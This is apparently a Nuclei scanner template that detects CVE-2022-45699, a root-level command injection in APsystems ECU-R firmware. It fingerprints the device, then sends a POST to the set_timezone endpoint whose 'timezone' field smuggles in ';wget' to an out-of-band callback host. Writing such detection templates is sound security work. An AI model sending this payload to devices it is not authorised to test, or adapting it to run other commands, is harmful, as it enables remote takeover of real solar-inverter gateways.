id: CVE-2022-45699 info: name: APsystems ECU-R Firmware - Command Injection author: pussycat0x severity: critical description: | Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter. reference: - https://github.com/0xst4n/APSystems-ECU-R-RCE-Timezone classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45699 cwe-id: CWE-78,CWE-94 epss-score: 0.12693 epss-percentile: 0.9361 cpe: cpe:2.3:o:apsystems:ecu-r_firmware:5203:*:*:*:*:*:*:* metadata: vendor: apsystems product: ecu-r_firmware tags: cve,cve2022,rce,apsystems,kev flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body words: - "Altenergy Power Control Software" internal: true - raw: - | POST /index.php/management/set_timezone HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded timezone=;wget+{{interactsh-url}};# matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: status status: - 200 # digest: 4a0a00473045022100d379315eb9abe92758bdef01d105927aa9aca5ffcf0aa59194c74b9195af760402203554078a3e994e47091ada4914c7a654327acca3cd891a8775ebf4e7746ccb3f:922c64590222798bb761d5b6d8e72950